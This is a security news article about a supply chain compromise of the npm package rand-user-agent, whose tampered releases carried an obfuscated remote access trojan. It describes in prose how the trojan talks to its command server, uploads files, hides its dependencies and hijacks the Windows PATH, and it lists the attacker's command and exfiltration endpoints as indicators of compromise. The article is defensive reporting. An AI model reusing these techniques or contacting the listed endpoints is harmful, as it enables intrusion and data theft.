An advanced supply chain attack has targeted the well-known npm package rand-user-agent, which receives about 45,000 downloads every week, in a worrying development for the JavaScript developer community.
Maintained by WebScrapingAPI, this package is designed to generate randomized, real-world user-agent strings based on their frequency of occurrence.
However, recent analysis has uncovered malicious code embedded in several of its latest releases, transforming a trusted utility into a covert Remote Access Trojan (RAT) capable of compromising systems and exfiltrating sensitive data.
.png
)
Malicious Code Injected
The attack first came to light when security researchers detected suspicious code in the dist/index.js file of versions 2.0.83, 2.0.84, and 1.0.110 of the package.
Unlike the last publicly documented update to the GitHub repository, which corresponds to version 2.0.82 from seven months ago, these subsequent releases on npm contained hidden, obfuscated scripts not present in the source code.
This discrepancy strongly suggests that the npm registry was directly tampered with, bypassing the project’s official repository.
The malicious code, initially concealed behind horizontal scroll bars and layers of obfuscation, reveals a payload that establishes covert communication channels with command-and-control (C2) servers.
It connects to a socket endpoint at http://85.239.62.36:3306 using socket.io-client for real-time command reception and uploads files to http://85.239.62.36:27017/u/f via HTTP POST requests facilitated by axios.
Both dependencies are dynamically installed if absent, hidden in a .node_modules folder within the user’s home directory to evade detection.
RAT Payload Enables Remote Control
Upon execution, the RAT identifies the compromised system by transmitting a unique client ID (combining hostname and username), OS type, and process ID to the C2 server.
According to the Report, it supports a range of commands, enabling attackers to change directories, execute arbitrary shell commands, and upload individual files or entire directories to a designated endpoint.
A particularly insidious feature targets Windows systems by prepending a crafted path-%LOCALAPPDATA%\Programs\Python\Python3127-to the PATH environment variable.
This subtle hijack could allow malicious binaries to masquerade as legitimate Python tools, exploiting environments where Python is commonly used.
Such capabilities grant attackers deep access to infected systems, posing a severe risk of data theft and unauthorized control.
Developers who have installed the affected versions are urged to immediately audit their systems for indicators of compromise, including unexpected network traffic to the identified C2 endpoints.
Remediation steps include uninstalling the compromised package, purging associated modules, and monitoring for unauthorized changes to environment variables or file uploads.
This incident underscores the persistent threat of supply chain attacks in open-source ecosystems, where trust in widely-used packages can be weaponized with devastating effect.
The broader implications call for enhanced scrutiny of npm releases and robust verification mechanisms to prevent such breaches from recurring.
Indicators of Compromise (IoC)
| Indicator Type | Value | Description |
|---|---|---|
| Malicious Versions | 2.0.83, 2.0.84, 1.0.110 | Affected package versions |
| Socket Connection | http://85.239.62.36:3306 | C2 server for command control |
| File Upload Target | http://85.239.62.36:27017/u/f | Endpoint for data exfiltration |
Setting Up SOC Team? – Download Free Ultimate SIEM Pricing Guide (PDF) For Your SOC Team -> Free Download
